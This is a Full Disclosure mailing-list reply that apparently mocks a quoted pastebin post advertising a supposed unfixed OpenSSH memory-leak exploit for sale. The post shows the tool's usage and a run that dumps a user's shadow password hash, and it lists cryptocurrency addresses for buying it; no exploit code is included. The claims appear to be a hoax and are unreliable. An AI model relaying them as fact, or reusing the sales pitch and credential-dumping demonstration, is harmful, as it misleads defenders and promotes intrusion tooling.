PAM, how does it work?
2014-05-07 1:08 GMT+03:00 <[email protected]>: > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > http://pastebin.com/raw.?i=gjkivAf3 > > > - -- CUT -- > #exploit #openssh > ░░░░░░ ▓▓▓▓▓▓ > ░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░░░░░░░░░█ ▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░ ▓▓▓▓▓▓▓▓▓▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░░░░█████░░░░░░░░ ▓▓▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░░░░░░▓▓▓█████░░░░░░ ▓▓▓▓▓▓▒▒▒▒▒░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░░█▓▓▓▓████░░░░░░░ ▓▓▓▓▓▓▓▒▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░▓▓▓▓▓▓▓▓▓█░░░░░░ ▓▓▓▓▓▓▒░░░░░░░░▓▓▓▓▓▓▓▓▓▓ > ░░░▓▓▓▓▓▓▓▓▓▓▓█░░░░░░ ▓▓▓▓▓▓▒░░░░░ ▓▓▓▓▓ > ▓▓▓▓▓▓▓▓▓▓▓░░░░░░░ ▓▓▓▓▓▓▓░░ ░░░▓ > ▓▓▓▓▓▓▓╔════════════════════════════════════╕░░░░░▓▓ > ░░░░░░░░░║ OpenSSH sshd - memory leak │▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░║ 5.1-6.X │▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░░░░░║ (priv8, still unfixed) │▓▓▓▓▓▓▓▓▓▓▓ > ░░░░░░░ ╙────────────────────────────────────┘ ▓▓▓▓▓▓▓ > > u mad Heartbleed ? ... > > ==== > Release date: 04/30/2014 > Product: OpenSSH > Vendor: http://www.openssh.com/ > CVE candidate number: CVE-2018-XXXX (maybe 2020+...) > ==== > > We found two years ago a memory disclosure vulnerability in the OpenSSH > server > which allows to remotely extract data from the sshd server's children > processes > memory zones. > > This vulnerability exploits a bad check on the network layer of the sshd > server > that we trigger to retrieve all children processes memory sections thereby > allowing us to dump: > - - system users hashes > - - keys > - - many random things ;) > > This exploit was tested on: > - - SSH-2.0-OpenSSH_5.1p1 Debian-5 > - - SSH-2.0-OpenSSH_5.1p1 DragonFly-20080927 > - - SSH-2.0-OpenSSH_5.2p1 FreeBSD-20090522 > - - SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3 > - - SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1 > - - SSH-2.0-OpenSSH_6.1p1 Debian-4 > - - SSH-2.0-OpenSSH_6.2p2-hpn13v14 FreeBSD-openssh-portable-6.2.p2_3,1 > - - SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1 > - - SSH-2.0-OpenSSH_6.4p1 FreeBSD-openssh-portable-6.4.p1,1 > - - SSH-2.0-OpenSSH_6.5p1 CentOS RHEL > - - SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1 > - - ... many more > > Enough bullshit, POC TIME ! > > ===== > > $> ls -lh > total 227K > drwxr-xr-x 2 vjn vjn 4.0K Apr 30 01:53 . > drwxrwxrwt 32 root root 4.0K Apr 30 01:53 .. > - -rw-r--r-- 1 vjn vjn 236K Apr 30 01:53 icanhaze.c > > $ sha1sum icanhaze.c > d7faeb46f10ea6b7058a116043c1f0ce7a158c7f icanhaze.c > > $> gcc icanhaze.c -O3 -lcrypto -lopenbsd-compat -lssl -lssh -lpam -o > icanhaze > $> ./icanhaze > +------------------------------+ > | OpenSSH 5.1-6.X - infoleak | > | don't evar fuckin release it | > +------------------------------+ > > Usage: ./icanhaze [OPTIONS] > -h, --host <host> > Hostname or IP > -p, --port <port> > Port number (default: 22) > -d, --dump <dump_file> > Dump output file > -H, --hashes <hashes_file> > User hashes dump file (john) > -v, --verbose > Verbose mode > -D, --debug > Debug mode > > Supported architectures: x86, x86_64, armv7 > Supported operating systems: Linux, *BSD > > $> ./icanhaze -v -h 192.168.10.5 -p 22 -d output.dump -H > +------------------------------+ > | OpenSSH 5.1-6.X - infoleak | > | don't evar fuckin release it | > +------------------------------+ > [I] - connecting to target 192.168.10.5 on port 22 > [I] - sshd banner: SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1 > [I] - let magic happenz > [W] - bad luck... retrying > [W] - bad luck... retrying > [W] - bad luck... retrying > [W] - bad luck... retrying > [W] - bad luck... retrying > [W] - bad luck... retrying > [I] - ____STAGE_1____: OK > [I] - mode: x86_64 > [I] - pointerz fuckery > [I] - ____STAGE_2____: OK > [I] - fingerprinted child sectionz table > 7f863100f000-7f8631010000 > 7f8631213000-7f8631214000 > 7f8631418000-7f8631419000 > 7f863161b000-7f863161c000 > 7f863181e000-7f863181f000 > 7f8631a22000-7f8631a23000 > 7f8631c68000-7f8631c69000 > 7f8631e6b000-7f8631e6c000 > 7f863206d000-7f863206e000 > 7f8632272000-7f8632273000 > 7f8632475000-7f8632476000 > 7f863267a000-7f863267b000 > 7f863287e000-7f863287f000 > 7f8632a80000-7f8632a81000 > 7f8632c82000-7f8632c83000 > 7f8632e84000-7f8632e85000 > 7f8633092000-7f8633093000 > 7f8633093000-7f863309f000 > 7f86332a4000-7f86332a5000 > 7f86334b0000-7f86334b1000 > 7f86336bb000-7f86336bc000 > 7f86338c3000-7f86338c4000 > 7f8633ad7000-7f8633ad8000 > 7f8633ad8000-7f8633ada000 > 7f8633cdd000-7f8633cde000 > 7f8633ee6000-7f8633ee7000 > 7f863410e000-7f863410f000 > 7f863410f000-7f8634110000 > 7f8634327000-7f8634328000 > 7f8634328000-7f863432c000 > 7f863452f000-7f8634530000 > 7f8634745000-7f8634746000 > 7f8634746000-7f8634748000 > 7f8634acc000-7f8634acd000 > 7f8634acd000-7f8634ad2000 > 7f8634cd5000-7f8634cd6000 > 7f8634fa8000-7f8634faa000 > 7f86351e7000-7f86351e9000 > 7f86353f1000-7f86353f2000 > 7f86353f2000-7f8635420000 > 7f8635636000-7f8635637000 > 7f8635839000-7f863583a000 > 7f8635a41000-7f8635a42000 > 7f8635e13000-7f8635e22000 > 7f8635e22000-7f8635e26000 > 7f8636044000-7f8636045000 > 7f8636045000-7f8636046000 > 7f8636253000-7f8636254000 > 7f863645d000-7f863645e000 > 7f863645e000-7f863645f000 > 7f863665c000-7f8636666000 > 7f863667c000-7f863667e000 > 7f863667f000-7f8636680000 > 7f8636680000-7f8636681000 > 7f863690b000-7f863690c000 > 7f863690c000-7f8636915000 > 7f86383de000-7f8638441000 > 7fff42400000-7fff42421000 > [I] - dumping (may take some time) > ................................/ > ................................/ > ................................/ > ................................/ > ................................/ > ................................/ > ................................/ > ................................/ > ................................/ > ................................- > [I] - dump succeeded > [I] - raw result hexdump: > // cut > 000ae5f0 00 00 00 00 00 00 00 00 11 10 00 00 00 00 00 00 > |................| > 000ae600 4c 69 6e 75 78 20 64 65 62 69 61 6e 2d 6d 61 73 |Linux > debian-mas| > 000ae610 74 65 72 20 33 2e 31 31 2d 30 2e 62 70 6f 2e 32 |ter > 3.11-0.bpo.2| > 000ae620 2d 61 6d 64 36 34 20 23 31 20 53 4d 50 20 44 65 |-amd64 #1 > SMP De| > 000ae630 62 69 61 6e 20 33 2e 31 31 2e 31 30 2d 31 7e 62 |bian > 3.11.10-1~b| > 000ae640 70 6f 37 30 2b 31 20 28 32 30 31 33 2d 31 32 2d |po70+1 > (2013-12-| > 000ae650 31 37 29 20 78 38 36 5f 36 34 0a 0a 54 68 65 20 |17) > x86_64..The | > 000ae660 70 72 6f 67 72 61 6d 73 20 69 6e 63 6c 75 64 65 |programs > include| > 000ae670 64 20 77 69 74 68 20 74 68 65 20 44 65 62 69 61 |d with the > Debia| > 000ae680 6e 20 47 4e 55 2f 4c 69 6e 75 78 20 73 79 73 74 |n GNU/Linux > syst| > 000ae690 65 6d 20 61 72 65 20 66 72 65 65 20 73 6f 66 74 |em are free > soft| > 000ae6a0 77 61 72 65 3b 0a 74 68 65 20 65 78 61 63 74 20 |ware;.the > exact | > 000ae6b0 64 69 73 74 72 69 62 75 74 69 6f 6e 20 74 65 72 > |distribution ter| > // cut > 000bcf10 63 68 61 72 6c 79 00 78 00 31 30 30 30 3a 31 30 > |charly.x.1000:10| > 000bcf20 30 30 3a 43 68 61 72 6c 79 20 61 64 6d 69 6e 2c |00:Charly > admin,| > 000bcf30 2c 2c 00 2f 68 6f 6d 65 2f 63 68 61 72 6c 79 00 > |,,./home/charly.| > 000bcf40 2f 62 69 6e 2f 62 61 73 68 00 00 6f 65 00 2f 75 > |/bin/bash..oe./u| > 000bcf50 73 72 2f 62 69 6e 2f 7a 73 68 00 00 73 65 00 00 > |sr/bin/zsh..se..| > 000bcf60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 > |................| > // cut > 000be690 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff > |................| > 000be6a0 ff ff ff ff ff ff ff ff 63 68 61 72 6c 79 00 24 > |........charly.$| > 000be6b0 36 24 6f 62 6f 67 44 58 78 79 24 73 34 4d 6b 55 > |6$obogDXxy$s4MkU| > 000be6c0 4c 43 6b 4c 58 2e 66 55 41 35 76 63 70 53 2f 67 > |LCkLX.fUA5vcpS/g| > 000be6d0 66 4f 30 65 6f 33 2e 42 47 45 48 56 43 4d 74 33 > |fO0eo3.BGEHVCMt3| > 000be6e0 55 55 57 77 52 46 69 47 6b 7a 4d 52 48 78 53 64 > |UUWwRFiGkzMRHxSd| > 000be6f0 53 47 45 4f 37 57 31 6a 34 69 64 55 2e 5a 55 55 > |SGEO7W1j4idU.ZUU| > 000be700 77 62 30 6e 43 6a 44 63 46 64 77 36 32 6f 6c 59 > |wb0nCjDcFdw62olY| > 000be710 2e 00 31 36 31 39 30 3a 30 3a 39 39 39 39 39 3a > |..16190:0:99999:| > 000be720 37 3a 3a 3a 00 00 00 00 00 00 00 00 00 00 00 00 > |7:::............| > 000bf0c0 61 31 2d 39 36 2d 65 74 6d 40 6f 70 65 6e 73 73 > |a1-96-etm@openss| > 000bf0d0 68 2e 63 6f 6d 2c 68 6d 61 63 2d 6d 64 35 2d 39 > |h.com,hmac-md5-9| > 000bf0e0 36 2d 65 74 6d 40 6f 70 65 6e 73 73 68 2e 63 6f > |[email protected]| > 000bf0f0 6d 2c 68 6d 61 63 2d 6d 64 35 2c 68 6d 61 63 2d > |m,hmac-md5,hmac-| > 000bf100 73 68 61 31 2c 75 6d 61 63 2d 36 34 40 6f 70 65 > |sha1,umac-64@ope| > 000bf110 6e 73 73 68 2e 63 6f 6d 2c 75 6d 61 63 2d 31 32 > |nssh.com,umac-12| > 000bf120 38 40 6f 70 65 6e 73 73 68 2e 63 6f 6d 2c 68 6d > |[email protected],hm| > 000bf130 61 63 2d 73 68 61 32 2d 32 35 36 2c 68 6d 61 63 > |ac-sha2-256,hmac| > // cut > 0024db80 35 33 20 33 61 20 36 35 20 20 7c 4c 41 4e 47 55 |53 3a 65 > |LANGU| > 0024db90 41 47 45 3d 65 6e 5f 55 53 3a 65 7c 0a 30 30 30 > |AGE=en_US:e|.000| > // cut > 002516d0 36 39 20 36 66 20 36 65 20 20 7c 65 73 73 69 6f |69 6f 6e > |essio| > 002516e0 6e 29 3a 20 73 65 73 73 69 6f 6e 7c 0a 30 30 30 |n): > session|.000| > 002516f0 63 32 61 33 30 20 20 32 30 20 36 66 20 37 30 20 |c2a30 20 > 6f 70 | > 00251700 36 35 20 36 65 20 36 35 20 36 34 20 32 30 20 20 |65 6e 65 64 > 20 | > 00251710 36 36 20 36 66 20 37 32 20 32 30 20 37 35 20 37 |66 6f 72 20 > 75 7| > 00251720 33 20 36 35 20 37 32 20 20 7c 20 6f 70 65 6e 65 |3 65 72 | > opene| > 00251730 64 20 66 6f 72 20 75 73 65 72 7c 0a 30 30 30 63 |d for > user|.000c| > // cut > 00251770 20 36 34 20 33 64 20 20 7c 20 63 68 61 72 6c 79 | 64 3d | > charly| > 00251780 20 62 79 20 28 75 69 64 3d 7c 0a 30 30 30 63 32 | by > (uid=|.000c2| > 00251790 61 35 30 20 20 33 30 20 32 39 20 30 30 20 30 30 |a50 30 29 > 00 00| > [I] - System users hashes (1): > > charly:$6$obogDXxy$s4MkULCkLX.fUA5vcpS/gfO0eo3.BGEHVCMt3UUWwRFiGkzMRHxSdSGEO7W1j4idU.ZUUwb0nCjDcFdw62olY.:16190:0:99999:7::: > [I] - Done, exiting... > > $> > > ===== > Since we detected few exploitations tentatives of this vulnerability > through > our honeypots network, we concluded that an other team / organization > discovered it and decided to sell it. > (Yes, we build honeypots rules for our exploits) > > We don't have access to exploit black markets and we are now happy to > offering > it for sale to you both black and white hats. > > == How to buy == > Send 66666.6 BC (Blackcoin) to BLkrmaoY7XQfUUCSCJfHGq8tTig5qJmZXT > or > 2000000 WC (Whitecoin) to Wbi8SqBjymeedtNwM9zhaSm3bMnZvgifR2 > or > 20 BTC (Bitcoin) to 14PEL35LQf81oCvSPurhoyTSvosvtQT7u3 > > then send your transaction ID by mail to [email protected] and > we will > send you the download link and password. (PGP recommended) > > icanhaze.c sha1:d7faeb46f10ea6b7058a116043c1f0ce7a158c7f > > Please note that we are busy and we will NOT answer to questions, social > engineering tentatives or dumb comments. Price is non-negotiable. > == > > Some teraoctets of custom pintools and ASAN traces give us many other > vulnerabities to dig and work to do, see you soon for some news about : > - - BIND > - - Nginx > - - Apache HTTPd > > . 1\-5\61\-J\48/a \~£\3|2\D6\ %%!%}). > R. > > - -- CUT -- > > Can anyone verify this? > > - -- > == > > Don Alexander > > It's a tough job, but some mug has to do it... > > RooSoft Ltd > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.15 (GNU/Linux) > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ > > iEYEARECAAYFAlNpXWgACgkQuipFNInZ6evZZACghN8Fd6ZIXaDtgnmxvcxpd+MG > DpEAn3iM0XdhZIe4U2cMYI6XrniZ7iBH > =ZxbR > -----END PGP SIGNATURE----- > > > _______________________________________________ > Sent through the Full Disclosure mailing list > http://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
